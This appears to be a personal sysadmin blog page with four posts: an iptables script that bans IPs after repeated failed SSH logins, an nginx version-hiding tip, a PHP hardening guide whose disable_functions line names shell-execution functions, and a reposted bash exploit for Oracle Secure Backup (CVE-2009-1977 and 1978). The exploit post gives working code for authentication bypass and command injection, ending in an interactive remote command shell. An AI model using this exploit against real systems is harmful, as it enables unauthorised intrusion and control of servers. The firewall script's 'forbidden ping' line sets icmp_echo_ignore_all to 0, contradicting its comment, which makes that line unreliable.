Oct 24

Drop probe ip by iptables

By jason Shell Script No Comments »

Modify crontab

* * * * * root /home/cnscn/sh/ssh_scan_crontab.sh >/dev/null 2>&1

ssh_scan_crontab.sh script

  • $ cat /home/cnscn/sh/ssh_scan_crontab.sh
  • #!/bin/bash
  • # Author http://jabin.cublog.cn
  • # Modify cnscn http://cnscn2008.cublog.cn
  • # Modify xinyv
  •  
  • #set timezone
  • export LC_ALL=UTC
  •  
  • # gather 1 minutes log from secure,count and drop it by iptables
  • SCANNER=$(awk 'BEGIN{ tm=strftime("%b %e %H:%M",systime()-60);}  $0 ~ tm && /Failed password/ && /ssh2/ {print $(NF-3)}' /var/log/secure |sort|uniq -c |awk '{print $1"="$2;}')
  •  
  •  
  • for i in $SCANNER
  • do
  • echo $i
  •        # get fialure number
  •        NUM=`echo $i|awk -F= '{print $1}'`
  •  
  •        # get ip address
  •        IP=`echo $i|awk -F= '{print $2}'`
  •  
  •        # drop and log
  •        if [ $NUM -gt 5 ] && [ -z "`/sbin/iptables -vnL INPUT|grep $IP`" ]
  •        then
  •                /sbin/iptables -I INPUT -s $IP -j DROP
  •                echo "/sbin/iptables -I INPUT -s $IP -j DROP" >> /home/cnscn/sh/ssh_scan_iptables.sh
  •                logger -i -t "ssh_scan_crontab" -f /var/log/messages "$IP($NUM)..."
  •        fi
  • done
  • #End of Script
  •  
  •  
  • .start it when system up
  • $ cat myiptables.sh
  • #!/bin/bash
  • #chkconfig: 345 85 15
  • #description: my iptables rules, which can auto run when system start
  •  
  • # This is a script
  • # Edit by liwei, cnscn
  • # establish a static firewall
  •  
  • #network interface
  • interdevice="eth0"
  •  
  • #port
  • #21       ftp
  • #15022    sshd
  • #25       smtp
  • #53       named
  • #80       http
  • #110      pop3
  •  
  • #Allow Access port
  • Open_ports="21 20 22 80"
  •  
  • #
  • Allow_ports="21 20 80 "
  •  
  • #clean old rules
  • iptables -F
  • iptables -X
  • iptables -t nat -F
  • iptables -t nat -X
  •  
  • #Add rule for drop bad ip
  • /home/cnscn/sh/ssh_scan_iptables.sh
  •  
  • #Allow My ip
  • /sbin/iptables -I INPUT -s 111.127.xxx.xxx -j ACCEPT
  •  
  • for eths in $interdevice ; do
  •  
  •   #
  •   #iptables -A INPUT -i ! $eths -j ACCEPT
  •  
  •   #Allow all access’s port(--dport)
  •   for Port in $Open_ports ; do
  •     iptables -A INPUT -i $eths -p tcp --dport $Port -j ACCEPT
  •     iptables -A INPUT -i $eths -p udp --dport $Port -j ACCEPT
  •   done
  •  
  •   #Deny spoof
  •   iptables -A INPUT -i $eths -p tcp -j REJECT --reject-with tcp-reset
  •   iptables -A INPUT -i $eths -p udp -j REJECT --reject-with icmp-port-unreachable
  • done
  •  
  • #forbidden ping
  • echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all
  •  
  • #End of Script

    • Tagged with:
    Oct 06

    Oracle Secure Backup Server 10.3.0.1.0 Auth Bypass/RCI Exploit

    By jason Security Tools 1 Comment »

    #!/bin/bash

    #Oracle Secure Backup Administration Server authentication bypass, plus command injection vulnerability
    #1-day exploit for CVE-2009-1977 and CVE-2009-1978

    #PoC script successfully tested on:
    #Oracle Secure Backup Server 10.3.0.1.0_win32_release
    #MS Windows Professional XP SP3

    #In August 2009, ZDI discloses a few details regarding a couple of interesting vulnerabilities within Oracle Backup Admin server.
    #Since I was quite interested in such flaws, I did a bit of research. This PoC exploits two separate vulnerabilities: a smart
    #authentication bypass and a trivial command injection, resulting in arbitrary command execution.

    #References:
    #http://www.zerodayinitiative.com/advisories/ZDI-09-058/
    #http://www.zerodayinitiative.com/advisories/ZDI-09-059/

    #Use it for ethical pentesting only! The author accepts no liability for damage caused by this tool.
    #Luca "ikki" Carettoni (blog.nibblesec.org), 10th September 2009

    clear
    echo ":: Oracle Secure Backup Admin Server 10.3 AuthBypass/CodeExec Exploit ::"

    if [[ $# -ne 1 ]]
    then
        echo "usage: ./$(basename $0) <target IP>"
        echo "i.e.: ./$(basename $0) 192.168.0.100"
        exit
    fi

    if ! which curl >/dev/null
    then
        echo "’curl’ is required in order to handle HTTPS connections"
        exit
    fi

    TARGET=$1

    #Exploiting CVE-2009-1977 and getting a valid token
    echo "[+] Exploiting CVE-2009-1977 against $TARGET"
    postdata="button=Login&attempt=1&mode=&tab=&uname=–fakeoption&passwd=fakepwd"
    session=`curl -kis "https://$TARGET/login.php" -d $postdata | grep "PHPSESSID=" | head -n 1 | cut -d= -f 2 | cut -d\; -f 1`

    if [[ -z $session ]]
    then
        echo "[!] Fatal error. No valid token has been retrieved"
        exit
    fi

    echo "[+] I got a valid token: $session"

    #Use a valid session and CVE-2009-1978 in order to inject arbitrary commands
    echo "[+] Exploiting CVE-2009-1978 against $TARGET"
    shell="1%26ver>osb103shelltmp"
    curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
    check=`curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session" | grep -i Microsoft`

    if [[ -z $check ]]
    then
        echo "[!] Fatal error. I cannot execute arbitrary commands"
        exit
    fi

    echo "[+] Enjoy your non-interactive shell! Use EXIT to clean up everything"
    echo
    echo \>$check

    while(true); do
        echo -n \>
        read -r cmd
        if [ "$cmd" == "EXIT" ]
        then
            echo "[+] Removing the temporary file and closing"
            shell="1%26del%20osb103shelltmp"
            curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
            exit
        fi
        #URLencode function
        cmd=`echo -n "$cmd"|od -t x1 -A n|tr " " %`
        shell="1%26$cmd>osb103shelltmp"
        curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
        echo "[+] Last successful command execution:"
        curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session"
    done
    #end

    Tagged with:
    Jun 13

    how to turn off server version for nginx

    By jason Nginx Server No Comments »

    For securing, you probably want to turn off the version with the directive “server_tokens off”.

    server_tokens
    syntax: server_tokens on|off
    default: server_tokens on
    context: http, server, location
    Whether to send the Nginx version number in error pages and Server header.

    If you want to remove the name of the server completely you need to alter the source code prior to compiling.
    Edit /path/to/nginx-0.*/src/http/ngx_http_header_filter_module.c lines 48 and 49:

    static char ngx_http_server_string[] = “Server: nginx” CRLF; static char ngx_http_server_full_string[] = “Server: ” NGINX_VER CRLF;

    Put in anything you like.
    If you want to edit NGINX_VER, it is defined, along with some other relevant constants, in /path/to/nginx-0.*/src/core/nginx.h, lines 11-13.

    Refrence:http://wiki.nginx.org/NginxHttpCoreModule#server_tokens
                      http://www.net-square.com/httprint/httprint_paper.html

    Tagged with:
    Jun 09

    how to securing php

    By jason Application Security No Comments »

    PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML.Yes PHP is a programming language that works on Linux and windows server. And this language helps in maintaining user accounts and server. I will tell you some feature to lock down PHP and securing it. Firstly I will tell you about how to edit php.ini as this is the main arrangement folder for php. You can do it by following way:

    Put On Safe Mode:
    You can safe guard your security and functions which you are using through this easy mode. You can work out over the security problems happening in shared server with the help of PHP safe mode. Although it not good to resolve the security problem at php level but as features of web server and OS stage are not very trustworthy many webmasters prefer and use safe mode. I will too suggest you to use safe mode if you are working on shared environment. It will help you to keep your data safe and untouchable.

    Exampel:
    safe_mode = On

    Discontinue Unsafe PHP functions:
    Through php your server can mess up with other server an there is danger that anyone can hack your account and can get your root. Many users prefer apprehensive php scripts as to get entry to your server and to provide dangerous commands and capture your server and put there control.

    Example:
    disable_functions = phpinfo,eval,system,shell_exec,passthru,popen

    Put Off Registers Global:
    Through registers global anybody can introduce any variable like in the form of HTML scripts to your data as it is very easy under php environment. Anybody can write insecure code as php does not involve variable initialization. Internal variables get mixed with the data send by any other user. Many peoples did not know that from were this unwanted data is coming and getting mixed with their variable.

    Example:
    register_globals = Off

    Work on PHPsuexec:
    The great problem with PHP is that on Cpanel servers it works as nobody and if any user sets a script to 777 admittance so it means nobody user has right to use that file and if any other user sharing the same server wrote some script to search 777 files can also get entry over the file and he can very easily introduce some unwanted material to your data and can remain unknown. And safe mode does not work over sharing other user’s files and here PHPsuexec helps to maintain privacy and stops one user to get through other users file. And with PHPsuexec you can very easily trace the other person who is doing spamming over your mails.
    Through the above explained function you can easily protect PHP on shared server. There is also one more method, through which you can protect files from other user so that he should be unable to read or to spam it, that is open base protection.

    Enable open_basedir
    When the open_basedir parameter is enabled, PHP will be able to access only those files, which are placed in the specified directories (and subdirectories).

    Example:
    open_basedir = /var/www/html

    Close display error
    If the display_errors parameter is turned off, PHP errors and warnings are not being displayed. Because such warnings often reveal precious information like path names, SQL queries etc., it is strongly recommended to turn this parameter off on production servers.

    Exampel:
    display_errors = Off

    Open error log
    When log_errors is turned on, all the warnings and errors are logged into the file that is specified by the error_log parameter. If this file is not accessible, information about warnings and errors are logged by the Apache server.

    Example:
    log_errors = On

    Error log filename
    This parameter specifies the name of the file, which will be used to store information about warnings and errors (attention: this file must be writeable by the user or group apache)

    Example:
    error_log = filename

    Tagged with:
    preload preload preload